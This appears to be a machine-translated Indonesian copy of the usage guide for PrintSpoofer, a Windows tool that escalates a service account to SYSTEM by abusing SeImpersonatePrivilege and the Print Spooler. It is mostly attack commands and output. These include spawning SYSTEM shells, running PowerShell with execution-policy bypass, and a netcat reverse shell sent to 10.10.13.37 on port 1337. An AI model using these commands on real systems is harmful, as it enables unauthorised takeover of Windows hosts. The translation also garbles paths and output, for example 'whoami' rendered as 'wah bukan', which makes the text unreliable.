Dari LAYANAN LOKAL/JARINGAN ke SISTEM dengan menyalahgunakan SeImpersonatePrivilege
di Windows 10 dan Server 2016/2019.
Anda dapat memeriksa pesan bantuan menggunakan opsi -h
.
C:ALAT>PrintSpoofer.exe -h PrintSpoofer v0.1 (oleh @itm4n) Asalkan pengguna saat ini memiliki hak istimewa SeImpersonate, alat ini akan memanfaatkan Print Layanan spooler untuk mendapatkan token SISTEM dan kemudian menjalankan perintah khusus dengan CreateProcessAsUser() Argumen: -cJalankan perintah *CMD* -i Berinteraksi dengan proses baru di command prompt saat ini (defaultnya non-interaktif) -d Memunculkan proses baru di desktop yang sesuai dengan sesi ini *ID* (periksa ID Anda dengan qwinsta) -h Itu aku :) Contoh: - Jalankan PowerShell sebagai SISTEM di konsol saat ini PrintSpoofer.exe -i -c powershell.exe - Memunculkan prompt perintah SISTEM di desktop sesi 1 PrintSpoofer.exe -d 1 -c cmd.exe - Dapatkan shell terbalik SISTEM PrintSpoofer.exe -c "c:Tempnc.exe 10.10.13.37 1337 -e cmd"
Jika Anda memiliki shell interaktif , Anda dapat membuat proses SISTEM baru di konsol Anda saat ini.
Kasus penggunaan : mengikat shell, membalikkan shell, psexec.py
, dll.
C:ALAT>PrintSpoofer.exe -i -c cmd [+] Hak istimewa yang ditemukan: SeImpersonatePrivilege [+] Dinamakan pipa mendengarkan... [+] CreateProcessAsUser() Oke Microsoft Windows [Versi 10.0.19613.1000] (c) Perusahaan Microsoft 2020. Semua hak dilindungi undang-undang. C:WINDOWSsystem32>wah bukan sistem otoritas
Jika Anda dapat menjalankan perintah tetapi tidak memiliki shell interaktif, Anda dapat membuat proses SISTEM baru dan segera keluar tanpa berinteraksi dengannya.
Kasus penggunaan : WinRM, WebShell, wmiexec.py
, smbexec.py
, dll.
Buat shell terbalik:
C:TOOLS>PrintSpoofer.exe -c "C:TOOLSnc.exe 10.10.13.37 1337 -e cmd" [+] Hak istimewa yang ditemukan: SeImpersonatePrivilege [+] Dinamakan pipa mendengarkan... [+] CreateProcessAsUser() Oke
Pendengar Netcat:
C:ALAT>nc.exe -l -p 1337 Microsoft Windows [Versi 10.0.19613.1000] (c) Perusahaan Microsoft 2020. Semua hak dilindungi undang-undang. C:WINDOWSsystem32>wah bukan sistem otoritas
Jika Anda masuk secara lokal atau melalui RDP (termasuk VDI), Anda dapat memunculkan prompt perintah SISTEM di desktop Anda. Pertama, periksa ID sesi Anda dengan perintah qwinsta
lalu tentukan nilai ini dengan opsi -d
.
Kasus penggunaan : Sesi Terminal (RDP), VDI
C:ALAT>qwinsta PERANGKAT JENIS NEGARA ID PENGGUNA NAMA SESI layanan 0 Disk konsol Administrator 1 Aktif >rdp-tcp#3 pengguna lab 3 Aktif rdp-tcp 65536 Dengarkan C:ALAT>PrintSpoofer.exe -d 3 -c "powershell -ep bypass" [+] Hak istimewa yang ditemukan: SeImpersonatePrivilege [+] Dinamakan pipa mendengarkan... [+] CreateProcessAsUser() Oke